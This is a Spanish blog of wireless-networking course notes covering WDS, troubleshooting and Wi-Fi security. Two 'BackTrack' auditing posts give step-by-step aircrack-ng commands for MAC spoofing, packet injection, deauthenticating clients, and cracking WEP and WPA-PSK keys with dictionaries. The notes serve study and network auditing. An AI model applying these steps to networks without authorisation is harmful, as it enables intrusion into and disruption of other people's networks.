Páginas

lunes, 27 de abril de 2009

Redes - Comunicaciones - Wireless (7)

Para conectar dos redes wireless ubicadas en dos edificios diferentes con un limite de 40 kilometros.
Utilizando dos Bridge y antena direccional.

Los Bridge tienen que estar en el exterior y protegidos de las inclemencias del tiempo.

Tenemos AP's que pueden usarse como Bridge para comunicarse directamente por la radio del AP. Opciones:

Caso a) Usar un AP como un REPETIDOR. (Sistema de distribucion DS). Colocado dentro del rango del primer AP. El AP repetidor esta configurado como cliente. Busca a quien asociarse. Las peticiones las pasa al primer AP. Si el primer AP cae caen todos. Todas las comunicaciones llegaran al Root (primer AP) con la MAC del repetidor, no con la MAC de los NODOS. Por tanto, no sera posible el filtrado MAC. No esta estandarizado. En caso de tener mas de uno conectado al AP repetidor mas de un pc enviara paquetes con la misma mac, porque la mac correspondera a la MAC del repetidor. Cuando los paquetes llegan al Root llegaran con la misma MAC y difetente IP.

Caso b) Dos redes inalambricas que quiero conectar entre si. WDS (sistema de distribucion inalambrica). Cada cliente se conecta a su AP y los dos AP's se conectan entre si. Uno de los AP es un router. los paquetes llegaran con la identidad (MAC) de cada cliente. No se pierde la identidad de los paquetes. Si cae una red la otra continua trabajando. Los dos AP's deben configurarse como WDS, el MODO DE TRABAJO. Un AP root solo conecta con clientes, para conectar ap's entre si cambiamos a WDS. Los AP's deben estar en el mismo CANAL. Baja el rendimiento general de la Red. Es recomendable el mismo SSID. Mismo modelo, misma configuracion, etc. Pueden hacer enlaces con varios.

El modelo LINKSYS WRT54GL utiliza firmware GPL (sabes lo que hace, como lo hace y todo lo que hace), de libre distribucion (estan obligados a publicar el codigo fuente). De esta manera puedo modificar el firmware y tener opciones (como WDS), de las que antes no disponia o utilizar firmware que circula por la red de manera gratuita.

Solucion de problemas (Troubleshosting):
Cuando hay fallas tenemos dos metodos de busqueda. Deductivo e inductivo.

Deductivo. Observacion -> confirmar.
Inductivo. --> observar - extraer un patron - hipotesis --> teoria.
Acotar - restringir por medio de capas. En wireless, los interesan las capas 1,2 y 3.

En la capa 1, (señal), compruebo:
1.- La alimentacion. El ap tiene alimentacion
2.- Comprobacion del cableado (cable que va al AP (UTP) y cable de antena). Comprobador de cables -- cable tester.
3.- Interferencias (inspeccion de sitios).
4.- Compatibilidad de los Standard que los elementos esten trabajando en el mismo standard.
5.- Distancia - Velocidad
6.- Ahorro de energia. Errores de sincronismo. Parametro DTIM.
7.- Modo antena. Por que antena emito (Diversidad).
8.- Modo de trabajdo mal configurado.
9.- Interface activado.

En capa 2:
1.- Drivers (actualizarlos).
2.- Ad-Hoc / infraestructura sobre todo en el cliente.
3.- Seguridad.
4.- Trafico de paquetes. Con los leds. --> WLAN (wireless lan). WAN (internet). Sniffers dentro del propio AP o soft terceros.
5.- Restaurar/restaurar.

En capa 3:
1.- Direccion IP
2.- Gateway. Haciendo pings.
3.- Filtros (filtrado IP), y Firewalls que pueden provocar errores en la Red.
5.- NAT - Routers --> enrutamiento en general. Se comprueba haciendo un DMZ. Abrir DMZ para ese pc, si funciona, algun puerto esta bloqueando el router que algun programa necesita en ese pc. Reset.


SEGURIDAD. (Global).

Teniendo en cuenta las capas OSI
Seguridad por Aplicacion. Capas 5.6.7 (Protocolo de seguridad SH)
Seguridad por IP. Capa 3 (Protocolo IPSEC, paquetes cifrados, modo seguro)
Seguridad Fisica. Capas 1,2.

En nuestro caso, Wireless, nos centraremos en la capa Fisica. Nuestro AP Transporta TRAMAS, no paquetes IP. La seguridad tenemos que verla como algo global.

Seguridad
1.- Perimetral. Quien puede acceder a mi red fisicamente. Hay dos tipos. a) Internet --> a traves de un Router, puede llevar un filtrado de IP como seguridad, (el router = capa 3). Que ip's pasan y que ip's no pasan. b) colocar antes o despues del Router un Firewall, cuya configuracion decidira quien entra y quien sale. Puede ser un ordenador con Linux y firewall por software o un equipo fisico (firewall). c) VPN --> Conexion segura desde el exterior al servidor de mi red. Cuando hablo de Wireless tambien estoy saliendo de los limites fisicos de mi red, por tanto, tengo que hablar de seguridad perimetral.

El firewall limita la entrada desde Internet. Para las conexiones no me sirve configurar el firewall del, por ejemplo, Router de casa.
En la capa Fisica se trabaja con equipos, lo que suceda a partir de aqui es responsabilidad de las capas subsiguientes.

En capa 2 de las redes Wireless trataremos:
Autenticacion. Quien puede conectarse a mi red. El que se conecte este autenticado. Asociarse a mi red
Confidencialidad. Quien puede acceder a mis datos. Si los pqtes son pillados que no puedan leerlos (cifrar los datos).
Integridad. Asegurarme las integridad de los datos. Que nadie puede alterar el contenido de esos datos.

Seguridad Wifi: Lo primero que aparece es el sistema de seguridad
Primera Generacion.

Autenticacion --> SSID -- puede ser oculto y esta basado en SSID requerido o SSID abierto. Hay AP's que no aceptan SSID null. Tambien se utiliza el Filtrado de MAC. Que MAC puede conectarse a mi AP. Aqui entran los programas Spooffing -- utilizados para cambiar la MAC en la trama.
WEP --> se introdujo como sistema de seguridad. Cifrado de 64/128 bits. Puede ser --> OPEN o SHARED KEY. Utiliza un sistema de cifrado llamado RC4 (basado en clave privada y algoritmo CRC-32). Si esta en OPEN podra conectarse, no tiene que saber la clave para entrar pero no podra trabajar, transmitir o recibir. Si hago WEP con SHARED KEY -- cuando pido permiso el AP envia a la estacion un desafio que es una cadena aleatoria, el que recibe esa frase usando la clave WEP tiene que devolver la cadena cifrada y el AP compara el cifrado con uno que el ha hecho, si coincide le AUTENTICA si no coincide no le permitira Autenticarse. El OPEN es mas seguro que el SHARED KEY.

El formato puede ser ASCII o HEXADECIMAL. Cada letra ASCII tiene su equivalente en dos NUMEROS en HEX y cada numero en hex correponde a 8 bits. En la clave de 64 bits solo seran necesarios 40 bits el resto 24 bits los pone el ordenador. En la 128 bits igual solo tendre que poner 104 bits los 24 bits restantes los pone el pc. Por ejemplo, en la de 64 bits ASCII = ABBAD --> Hexadecimal = 4142424144 (8 bits x 5 = 40 bits). ASCII - ABBAD = HEX - 4142424144 sera la correpondiente clave WEP. Cifrado 128 bits. ASCII = ABBADABBADABB --> HEX - 41424241444142424144414242 --> correspondiente a 13 pares de 8 bits c/u = 104 bits.

Un AP sirve para que un equipo inalambrico se conecte a una red cableada. El moden es un dispositivo que permite conectarme a la linea de telefono para conectarme a Internet. La clavija utilizada es la RJ11.

Proceso para conectar a un AP:
1. SSID
2. AUTENTICACION --> conectar el cable
3. ASOCIACION --> conectar el cable
4. KEY WEP --> clave (40 bits + 24 bits - vector de inicalizacion = VI - va cambiando, son diferentes para c/trama)
5. KEY STREM --> clave completa

El emisor (AP), envia primero el IV y luego la trama encriptada. El cliente recibe el IV y la trama que contiene la primera parte de la KEY.
Existe la posibilidad de cambiar la clave manualmente en el AP y el cliente. Capturar sufientes IV's sera suficiente para averigua la clave. Paquetes configurados con el KEYSTREAM (clave completa). Como las posibilidades de combinacion del los IV's son limitados llegara un momento en que se repiten. De los puntos en comun que contienen sacare la clave. IV = 24 bits = 16,000,000 millones de conbinaciones diferentes. Tengo el encriptado y el IV, de estas deduzco la clave.

Inyectando Trafico aumento el trafico en la red. Me interesa la MAC del AP. Otra debilidad del WEP esta en la trama de comprobacion, el sistema que utiliza el destinatario para comprobar que el paquete que me ha enviado esta tal cual me lo han enviado, se utiliza la tecnica del CRC32, añade un dato y con ese dato se hace la comprobacion. Hay programas que varian el dato y el CRC32. Manipular tramas es un ataque con AP falso. MAN IN THE MIDDLE (hombre en el medio) - utilizar tarjetas que pueden trabajar en modo AP, recibir de los clientes y enviar al AP verdadero informacion manipulada.

Driftnet --> Linux -- Revela la informacion de los paquetes que circulan por la red en formato imagen, convierte los unos y ceros en imagenes. Construira con los datos la imagen.

WEP es un sistema de cifrado y autenticacion. Autenticacion solo en un sentido. El cliente no tenia que autenticar el AP.

WPA que no esta standarizado. El WPA2 si que se ha standarizado. En linux nos permite el WPA-SUPLICANT utilizar el WPA. La tarjeta de red tambien debe incluir el soporte a WPA. Es un sistema que utiliza un reconocimiento mutuo, el cliente comprueba el AP y el AP al cliente. Esto impide, por ejemplo, la utilizacion del MAN IN THE MIDDLE.
WPA --> PERSONAL - el propio AP gestiona la seguridad.
--> CORPORATIVA - Necesito de una instalacion extra, GNU-Linux es un Ordenador que lleva la seguridad de los AP's y claves de todos los ordenadores. Se llama SERVIOR LDAP. El servidor tendra una IP y un PASSWORD. Servidores de seguridad externos. El AP tiene que funcionar en LDAP.

WPA AUTENTICAR es autorizar al cliente transmitir.
WPA --> PSK (pre-shared-key) -- utilizado en WPA personal. Utiliza el protocolo TKIP (la forma que tiene de encriptar, metodo de cifrado). TSK con TKIP utiliza clave temporal. Utiliza claves dinamicas. Utiliza una clave para autenticarse y claves diferentes para cifrar. PSK es la clave compartida para autenticarse. Luego utiliza la PMK que es dinamica.

TKIP --> los IV's son de 48 bits. Los ataques de fuerza bruta son los utilizados en el descifrado de claves WPA.
PSK --> utiliza la PHASE (clave), SSID + la longitud SSID, con esos datos se generara una clave de 256 digitos.

En la integridad los WPA utilizan no los CRC (wep), si no una tecnica llamada MIC. Los datos y el comprobante estan protegidos.

WPA:
Empresarial Autenticacion por servidor --> 802.1X/EAP (Servidor LDAP y RAIUS)
Cifrado --> TKIP-MIC

Personal --> Autenticacioon --> PKS
Cifrado TKIP-MIC comprobacion de errores.

WPA2
Servidores --> 802.1X/EAP
AES-CCMP

Personal --> PSK
ACS-CCMD

REPASO...

Wireless --> puente --> Bridge. No estan standarizados.

Los bridge solo pueden conectarse entre si.
Para que un equipo pueda hacer de Bridge y AP a la vez --> AP root - AP Repetidor (AP cliente), este ultimo puede recoger clientes y pasarselos al primero. Deben utilizar el mismo canal.
Segunda opcion utilizando WDS (wireless distribution system). Dos AP's configurados como WDS. los dos Conectan a clientes asocian a clientes y se comunican entre ellos. Deben tener la misma clave de cifrado y el mismo canal.

TROUBLESHOOTING --> diagnostico de problemas. Empezar siempre por lo mas sencillo.
Aislar el error por capas OSI.
Capa 1 --> la señal inalambrica que se transmite.
interferencias. Comprobar con programas de inspecion de sitios (software), un analizador de espectros (detecta las señales de todos los equipos que estan generando señales en la frecuencia 2.4, bluethooh, movil, un lector de codigo de barras conectado a un AP, etc.).
Antenas

Capa 2. Razones por las que no puedes conectar.
Seguridad.
El programa que tenga el control de la tarjeta mejor que sea la utilidad de la misma tarjeta, no el del sistema NO UNiX = no funciona.

Capa 3.
Descativar Firewall
IP

SEGURIDAD - las redes inalambricas por definicion son inseguras.
Diferentes metodos para asegurar mi red inalambrica.
La seguridad en una RED se entiende de forma GLOBAL.
Una red standard normal con vario servidores y estaciones de trabajo, wired, wifi y salida a Internet. Cuando me planteo la seguridad de esta red me la planteo de forma global. La seguridad viene dado por otros factores.
Hay una seguridad orientada para que nadie entre a mi red, routers, AP, pertenecen a la seguridad PERIMETRAL. Los NODOS cableados no.
Seguridad Interior. Derivada de los ataques producidos desde la propia LAN. Todo tiene que estar documentado. Un firewall puede ser un PC con dos tarjetas de red y un programa de Software. Ordenadores expuesto utilizan GNU-Linux por su fiabilidad y seguridad. Proxy es un ordenador que hace de Cache. Al solicitar una pagina de internet permitira almacenarla. Gano en rapidez.

SSID oculto: En las primeras redes la seguridad solo llevaba AP hide (oculto). SSID hide. Va en la cabecera y la cabecera no se encripta.

FILTRADO DE MAC: Impide o permite que cualquier ordenador que yo elija pueda conectar. Las MAC viajan en las cabeceras de la trama (formato txt).

WEP: Para asegurar la confidencialidad, encripto los paquetes. Sistema de clave simetrica estatica, misma clave el cliente y el AP. A la hora de autenticar puede elegir entre sistema OPEN o SHARED KEY. Necesitan saber la clave wep de 64 o 128 bits. Al transmitir CIFRAMOS los paquetes con el sistema RC4. A traves del CRC se puede comprobar si los datos coinciden con los enviados. Es un sistema de seguridad Standarizado. Si yo genero suficiente trafico alguien que este capturando paquetes puede llegar a averiguar la clave. Para solventar esta deficiencia existe la posibilidad de cambiar cada cierto tiempo la clave. Es un sistema totalmente inseguro.

WPA: Nace con caracter temporal. Tiene dos metodos de trabajo:

CORPORATIVO --> Con un administrador LDAP solo necesitare el nombre y la IP del servidor LDAP. Puedo decidir que no entre por clave sino por usuario. En vez de ser atendida por el AP se le pase al SERVIDOR LDAP/EAP. EAP --> Envia el password de manera que sea INDESCIFRABLE, lo que se llama un HASH. El standard utilizado por el servidor LDAP 802.1x, el protocolo que utliza para autenticar una red inalambrica.

PERSONAL --> redes simples WPA - PSK (solo se envia al inicio de la conexion). Pre-shared-key son de 256 bits. Una vez dentro la PSK no se usa. Para la comunicacioin se utiliza la PMK que es dinamica, temporal y puede regularse, en el AP, los segundos de validez de la clave. A nivel de confidencialidad la seguridad es muy alta. Si la clave PSK se descifra con diccionario (fuerza bruta), aunque conecte al AP ese cliente lo que no podra es leer la informacion que circula por la red. AUTENTICAR --> PSK. CIFRA/DESCIFRAR --> PMK. La encriptacion utilizada es la TKIP, clave dinamica utilizada en el WPA.

WPA2 --> 802.11i --> standard de seguridad para redes inalambricas. Como alternativa al TKIP esta el AES, que es otra forma de cifrar. Los clientes deben permitir la tecnologia ya sea WPA o WPA2 y esto dependera del sistemas operativo y de la tarjeta. Que exista compatibilidad. En el AP puedo actualizar el firmware y en el cliente, actualizar el driver de la tarjeta. En el sistema operativo, actualizar el WPA_SUPLICANT.

BackTrack - Auditoria de Redes Wireless II

Auditoria de Redes - Entendiendo lo que hacemos.

Los lamers son gente que se creen hackers pero hackean mediante programas creados por otras personas. Insultan a los programadores y se creen los mejores por saber utilizar programas hechos por otros. A esta clase de lamer, se le conoce mejor actualmente como "script kiddie".

Requisitos previos:

Hardware --> WNIC --> modo monitor
ANTENA --> aumenta el radio de accion. Mayor sesibilidad. 7dbi

Software --> Airodump-ng desde estaciones GNU-Linux (no podia ser de otro modo).
Airmon-ng
Aireplay-ng
Aircrack-ng
Kismet

Distribucion de GNU-LinuX a utilizar BACKTRACK 4

1. Identificacion y recopilacion de informacion. El ataque se dirige a un AP.

SSID
MAC
CHANNEL
ASOCIADO

Para esto utilizaremos airodump-ng.
Analiza las tramas y captura paquetes.

Para aumentar el trafico en la red se realizan los ataques. Para forzar el trafico. Se envian tramas al AP para provocar reacciones del entorno del AP. Los ataques se realizan con el aireplay. Los mas comunes son:
a) Ataque 0 (cero) Desautenticacion. Provoca la desconexion de uno o todos los clientes. Los clientes intentaran conectarse nuevamente al hacerlo enviaran informacion que sera capturada con el airodump-ng.
b) Ataque 1 (uno) Autenticacion falsa.
c) Ataque 3 (tres) reinyeccion de trafico. Aumentar velocidad del trafico. Forzar al cliente y al AP a que comuniquen mas cosas.
d) Buscar la clave con el aircrack-ng
e) Asociarse utilizando la clave encontrada.
f) IP valida. DHCP o en su defecto IP fija dentro del rango de la red de los demas ordenadores.
g) Puerta de enlace y DNS.
h) Ataque al Router.

Obstaculos:

1. ISSD oculta. jack tools (detecta el SSID). ESSID - jack
2. Filtrado de MAC. Spoofing --> macchanger cambia el numero de MAC. Suplanta la identidad de otro.

Consejos de seguridad. Desde la capa uno hasta la 3.

1. Limitar la señal. Bajar la potencia de emision para que tengan menos alcance. Full signal --> bajar la potencia de señal. Cuanto menos potencia para cubrir el area que necesito mejor.
2. Filtrado MAC.
3. Oculto SSID.
4. Autenticado --> PSK, Shared Key (WEP), Radius.
5. WPA2.
6. Cambio periodico de claves.
7. Desactivar DHCP.
8. Cambiar valores por defecto.
9. Monitorizar AP.

Hay programas recopiladores de WEP. Desde el punto de vista de empresas el acceso desde CD-ROM, USB, se desabilita.

Para cambiar a modo monitor la tarjeta Wireless puede utilizarse

root@syslinux~# iwconfig wlan1 mode monitor

para pasar a modo managed

root@syslinux~# iwconfig wlan1 mode managed.

Para hacer un enlace o apuntando al AP. La tarjeta tendra el registro de ese AP

root@syslinux~# iwconfig wlan1 mode monitor channel 6 (del AP al que quiero asociarme) essid nombre_ap

Capturar las tramas

root@syslinux~# airodump-ng wlan1 -w archivo -c (o --channel) 6.

abrir otra consola.

Inyectar trafico, (Solo tiene sentido si esta asociado a un cliente.)

root@syslinux~# aireplay-ng -3 wlan1 -b mac_objetivo -h mac_mi_wnic.

si no hay nadie conectado asocie su dispositivo wireless.

aireplay-ng -1 30 (intentos de conexion) wlan1 -e ssid -a mac_objetivo -h mac_dispositivo_miwnic

respondera asociation succesful !

abrir otra terminal

aireplay-ng -3 wlan1 -b mac_objetivo -h mac_dispositivo -x (paquetes/segundo) 300

abrir otra consola. Encontrando la clave WEP.

aircrack-ng *.cap

sábado, 25 de abril de 2009

BackTrack - Auditoria de Redes Wireless I

Utilizar BackTrack. Comprobar vulnerabilidades en Redes Wireless (WEP, WPA-PSK).

Conectar la tarjeta de Red y cargar el modulo de la tarjeta (dependera del Chipset de su tarjeta wireless).
lsmod para ver los modulos rmmod y modprobe para cargar y descargar modulos.

root@syslinux~# modprobe rt073usb

- comprobar interface con ifconfig

- poner en modo monitor

root@syslinux~# iwconfig rausb0 mode monitor

- desactivar interface

root@syslinux~# ifconfig rausb0 down

- cambiar MAC de la tarjeta

root@syslinux~# macchanger -m 00:55:44:33:22:11 rausb0

- levantar interface

root@syslinux~# ifconfig rausb0 up

- listar redes al alcance de mi tarjeta wireless

root@syslinux~# airodump-ng rausb0

- Elegir objetivo. Ctrl+c (para detener el scaneo de redes)

- capturar en un solo canal y guardar en archivo

root@syslinux~# airodump-ng rausb0 -w archivo -c channel

- mientras airodump captura paquetes abrimos otra Consola para inyectar paquetes y aumentar el trafico.

- si esta asociado.

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h macstation rausb0

- autenticarse - asociarse (mi mac cambiada)

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando cliente falso

root@syslinux~# aireplay-ng -3 -b macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando station

root@syslinux~# aireplay-ng -3 -b macobjetivo -h macstation rausb0

Algunos puntos de acceso requieren reasociarse cada 20 segundos, si no el falso cliente se considera desconectado. Asociarse cada 20 segundos.

aireplay-ng -1 20 -e WLAN_13 -b macobjetivo -h maccambiada rausb0

- en este punto la captura de pqtes en airodump-ng debe aumentar

- desautenticando clientes para obligarles a reasociarse
- WPA Handshake capture.

root@syslinux~# aireplay-ng -0 5 -a macobjetivo -c macstation rausb0

- si aun no funciona

root@syslinux~# aireplay-ng -0 10 -a macobjetivo rausb0

- Buscar la clave con aircrack-ng

- aircrack-ng archivo*.cap

- Ataque de diccionario (aircrack-ng) WPA-PSK

- Descargar diccionarios http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

- Crear diccionario

root@syslinux~# zcat all.gz | egrep -v '^#' > dic

- Utilizar diccionario

root@syslinux~# aircrack-ng -w dic -0 archivo*.cap

martes, 14 de abril de 2009

Reglas basicas de seguridad

* Utilizar un sistema *NiX, por ejemplo, GNU-Linux (cualquier distro).

* No deben abrirse los mensajes electrónicos de origen desconocido

* No deben facilitarse datos personales ni codigos PIN de acceso

* No deben abrirse archivos de remitentes desconocidos

* No deben apuntarse las claves de acceso PIN1 en ningun documento.

* No deben utilizarse PIN faciles de deducir

* No confiar nunca en los regalos y las promociones, ni responder a mensajes que soliciten informacion de forma urgente.
* Mantenerse informado sobre la seguridad general en el uso de internet

Richard Stallman:

"Muchos citan la economía como la única razón [para usar en las escuelas software libre], pero es un error grave no explicar la libertad [como razón]: así los demás no pueden aprender a valorar su libertad.

Pero [la economía] es un motivo. Varias empresas de software privativo suelen eliminar esa razón distribuyendo copias de su software no libre, gratuitas o casi, a las escuelas. Y cuando nos preguntamos por qué lo hacen podemos ver la segunda razón ¿lo hacen por su deseo idealista de promover la educación? pienso que no, pienso q su meta es usar las escuelas como instrumentos para imponer a la sociedad entera una dependencia permanente a su software privativo.

Funciona así: dan copias gratuitas a las escuelas, las escuelas enseñan a sus alumnos el uso de esos programas privativos y los gradúan como usuarios de software privativo, y esas mismas empresas no les ofrecerán copias gratuitas después de graduarse ni menos aún a las empresas para las cuales trabajarán después de graduarse. Toman la escuela en la mano para empujar a los alumnos y con ellos arrastrar a la sociedad entera. Es como darle a la escuela ampollas de drogas adictivas diciéndole "inyectadlas a los alumnos", para crear una dependencia; y por tanto la copia es gratis porque la primera dosis es gratis: sólo después habrá que pagar". Esas empresas tienen su departamento de ser-vicio educativo.

domingo, 12 de abril de 2009

Copiar tabla de particiones

Autor: Cesar Camilo

Backup de la tabla de particiones:
Hacer una copia de la tabla de particiones desde una consola.

a) Creo un directorio en root (raiz), de nombre imagen. Monto la particion /dev/sda7, previamente creada, en la carpeta imagen. Es la particion que utilizo para guardar imagenes, backup, etc. Fue creada durante el particionado del disco utilizando el System Rescue CD Linux. La estructura del disco duro de mi portatil es:

# fdisk -l

Disco /dev/sda: 120.0 GB, 120034123776 bytes
255 cabezas, 63 sectores/pista, 14593 cilindros
Unidades = cilindros de 16065 * 512 = 8225280 bytes
Identificador de disco: 0xd8000000

Disposit. Inicio Comienzo Fin Bloques Id Sistema
/dev/sda1 * 1 2014 16177423+ 83 Linux
/dev/sda2 4732 14593 79216515 5 Extendida
/dev/sda3 2015 3057 8377897+ 83 Linux
/dev/sda4 3058 4731 13446405 83 Linux
/dev/sda5 4732 5303 4594558+ 82 Linux swap / Solaris
/dev/sda6 5304 6652 10835811 83 Linux
/dev/sda7 12116 14593 19904503+ 83 Linux
/dev/sda8 6653 12115 43881516 83 Linux

Me desplazo al directorio raiz.

# cd /

Creo el directorio

# mkdir imagen

Monto la particion

# mount /dev/sda7 imagen

Realizo la copia de la tabla de particiones

# sfdisk -d /dev/sda > /imagen/tabla_particiones.bak

Entro en la particion para ver el archivo creado

# cd imagen

# ls -l
total 7437452

-rw------- 1 root root 2135948272 2006-02-17 10:01 home_ubuntu.000
-rw------- 1 root root 38138955 2006-02-17 10:01 home_ubuntu.001
-rw------- 1 root root 1902608027 2008-02-17 09:53 HOMEpclinuxos.000
-rw------- 1 root root 1869153420 2006-04-12 12:29 UBUNTU.000
-rw-r--r-- 1 root root 512 2008-03-01 06:45 mbr.ubuntu.pclinuxos
-rw------- 1 root root 538204408 2008-02-17 09:31 PCLINUXOS.000
-rw-r--r-- 1 root root 468 2008-04-12 14:33 tabla_particiones.bak

restaurar tabla de particiones:

Abra un terminal y teclee:

# sfdisk /dev/sda < imagen/tabla_particiones.bak

domingo, 5 de abril de 2009

Redes - Comunicaciones - Wireless (6)

Autor: Cesar Camilo

TOPOLOGIA WIRELESS:

Tipos de Redes

Clientes - inalambricas
Portatiles - DOCK -STATION Tableta p/conectar el portatil p/w en oficina y fuera de oficina.
Pdas.
Impresoras
Voz IP

Diferencias entre Ad-hoc e infraestructura:
Ad-hoc --> no ap, redes menores
infraestructura -> ap y sistema de distribucion, redes mayores

Punto de acceso:
Se centraliza el AP, se eliminan puntos ocultos (todos deben ver el mismo AP).

INFRAESTRUCTURA:
Decidir canal, ip, etc.
Se configura todo en el AP.
Cisco: dispositivos AIRONET. Los modernos son los de la familia de 1100 y 1200
Soho: (Small Ofice Home Office).
D-link AP2000 Es importante el Firmware, de este dependen las prestaciones.
Los linksys, su firmware se basa en Linux.


Categorias Wlan wireless:

Las wlan en el interior de un edificio = redes indoor. Van con AP.
Las wlan de edificio a edificio = outdoor. Bridge (puentes). Puede ser una alternativa a usar un ISP. De puente a puente puede llegar hasta 40 kms.

Las Guifi.net utilizan Bridge.

Tipos de red:

BSS esta basado en un AP basado en una microcelula o celula (area de cobertura) y coloco varios clientes.

Si la cobertura no es suficiente convertimos el BSS en ESS. Coloco otro AP. Y asi voy creciendo con AP's todo lo que quiera. Lo normal es que los AP esten conectados a un cable. La zona solapada se recomienda que sea del 10 - 15 % del radio del radio del ap.
Esas ESS van conectadas a la red general de la empresa = BACKBONE ETHERNET (espina dorsal de la red). Los AP's llevan normalmente un puerto RJ45 (Ethernet), para conectarlo a un SWITCH. Con el radio crean la micocelula y con el backbone se conectan al resto de la RED. Estos AP's deben usar canales diferentes.

Para llegar a un AP al que no podemos cablear, utilizaremos REPETIDORES. Los AP's se conectaran inalámbricamente a traves del repetidor. Para que se puedan intercomunicar mutuamente deberan estar en el mismo canal. Uno estara configurado como Root (Raiz) y el otro como Repetidor.

Los linksys actualizando el Firmware (Linux) podra utilizarse como REPETIDOR. Los d-link son baratos y lo hacen. Es recomendable que los dos AP's sean del mismo modelo. El Root le pasa la informacion al repetidor. Cuando un AP Cisco lo configuro como Repetidor este anula el puerto Ethernet. El rendimiento de la Red por cada repetidor disminuye a la mitad. No se recomienda hacer mas de dos saltos. Algunos AP's pueden trabajar a la vez como AP y como puente.

WDS alterna entre conectar a sus NODOS y a otra red.

Los Orinoco pierden la capacidad de conectar a sus clientes al pasarlos a repetidor. La solucion pasa por colocar otro AP (para la otra red).

Redes redundantes --> Consiste en tener varios AP's haciendo lo mismo. Dos AP's cercas (en diferentes canales, canales 1 y 6) y configurarlos en funcion de la cantidad de NODOS conectados, de manera que a partir de x nodos conectados no permita mas conexiones y salte a conectarse al otro AP. Esto se llama EQUILIBRIO DE CARGA, el AP tiene que permitirlo. Con esto gano velocidad.

Si lo que me importa es la fiabilidad, pongo dos AP's en el mismo canal, pero uno de ellos funcionara en MODO ESPERA. Solo funcnioa el segundo AP cuando el primero cae. Se llama ESTADO EN ESPERA.

REASOCIAR:
Itinerancia --> ESS
Para que dos sistemas AP garanticen la itinerancia tiene que garantizarse el cambio de AP y que el nuveo AP borre la ip anterior y asigne una nueva ip que sea una IP valida. Son redes diferentes. Cada AP tiene si servidor DHCP.

Lo primero que hacen los adaptadores es buscar redes disponibles. Esto se hace de dos maneras:
- Sondeo activo. Pide informacion a todos los canales. La propia tarjeta es la que pide esa peticion. Solo lo hace al conectar.
- Sondeo pasivo. Se queda escuchando e intenta descubrir por medio de las balizas los AP activos.

Una vez tiene la lista de ap's toman la Decision. Esta decision implica crear PERFILES.
Si la tarjeta tiene autoasociacion intetara buscar la conexion con uno de los equipos a los que tiene alcance.
Es lo que me permitira hacer la itinerancia. La informacion la envian los AP's, incluye ademas, numero de MAC clientes conectados, SSID, etc.

Autenticacion:
Se solicita una autenticacion y el AP responde, dependiendo de si es sistema abierto o clave compartida. si es abierto pasa todo el mundo. Con clave compartida la pedira, si tiene la clave entra y si no no podra. Tambien se rechazaran los equipos que no tienen (filtro de MAC activado), los numeros de MAC especificados. En ese momento la tarjeta de red solicita asociacion. Vamos a sincronizarnos, cada uno se reparte un ID y el AP reserva recursos para ese nodo.

Cuando estan asociados el cliente solicita un IP al servidor DHCP.

El AP solo trabaja con TRAMAS
Router intermediario capa 3.
Servidor DHCP asigne ip's
Switch no pueden trabajar como servidor DHCP porque no trabaja con IP's. Las ip's pertenecen a la capa 3 (Red).

El AP tiene una IP pero como no trabaja en la capa 3 esa ip se la tiene que dar alguien.

Nota: Los programas de inspeccion de sitio obligan a hacer sondeo activo. ¿Pregunta quien hay en los canales, 1, 2, 3... 13 ?.

Multivelocidad: Los AP's y la inalambricas trabajan con multivelocidad. La distancia provoca cambio de velocidad. Para asegurar la cobertura a una velocidad determinada utilizo el solapamiento (la zona comun, por ejemplo, a 5 mbps, junto mas los AP's cuando salga de la zona de 5 mbps y antes de entrar a la zona 4 del mio coincida con los 5 mbps del siguiente AP's).

QOS: = Calidad de servicio
Trata de determinar el uso de la red de cada cliente para asignarle la prioridad. Por ejemplo, un mensaje de texto tendra prioridad 3 y si es VoIP sera 1.
Es un servicio que a cada paquete que envie le pondra un numero. Cuando viajan se procesan primero los que tienen un numero que otro. En las inalambricas quien lleva o no el QOS es el AP. Donde se configura el TCP/IP esta la opcion de activar o desactivar el QOS. Y tambien en el Sistema Operativo. El AP dara prioridad a los que llevan QOS a nivel capa 2 (trama).

Todas estas opciones, (y mas), hacen que los mismos fabricantes tengan mas compatibilidades que equipos con diferentes fabricantes.

DISEÑO de REDES:

1. Recopilacion de informacion sobre el sitio y las necesidades de los NODOS, inspeccion de sitios (site survey = señales que hay en el ambiente)

2. Diseño previo. Puedo utilizar el programa dia (licencia GPL) = rediseño, hasta que tengo el diseño previo final.

3. Implementacion (montar): Incluye un periodo de ajustes y comprobacion.

4. Pruebas y correcciones.

5. Entrega del proyecto y firma


20kb --> 200 kbps + 40 % --> Prevision.

DISEÑO:
Recopilar informacion:

Necesidades --> Soft
--> Equipos >> ancho de banda

Restricciones --> Precio
--> Estructurales --> Site Survey
--> Decorativas (estetica)
--> Corporativas (contratos con empresas ajenas a las que utilizamos)

Diseño Previo: Con las herramientas de diseño --> Dia, Packet Tracer, etc. Evaluar, Rediseñar.

Adquirir Material --> Rediseño por las limitaciones, condiciones de trabajo del equipamiento, caracteristicas de los equipos.

Implementacion. Montar el equipo. Realizar pruebas --> 1 dia entero. Luego, 7 dias de prueba real con el personal trabajando. Se deja un equipo monotorizando. Se comprueban los datos. 6 meses de garantia.

PUNTOS DE ACCESO --> Infraestructura.

Sensibilidad es la capacidad para recibir señales inalambricas.

1.- Lo primero es elegir el Standard IEEE 802.11 a/b/g/n
2.- Puertos. Cantidad de conexiones que quiero que tenga el AP. Normalmente tienen 2 Un pueto de Radio y uno Ehternet.
3.- La potencia de señal = EIRP y la sesibilidad que es como de baja puede ser la señal para que la pueda recibir = -db (en decibelios).
La sensibilidad del equipo que recibe se mide en negativo. La sensibilidad esta relacionado con la velociad. Cuanto mas pequeño mejor (mas alejado de cero), o sea, -120db es mejor que -70db.
4.- Servicios. Que tenga QOS o no, funciona en modo repetidor, Seguridad. (Autenticacion por radio, wpa, wpa2, filtrado de MAC).
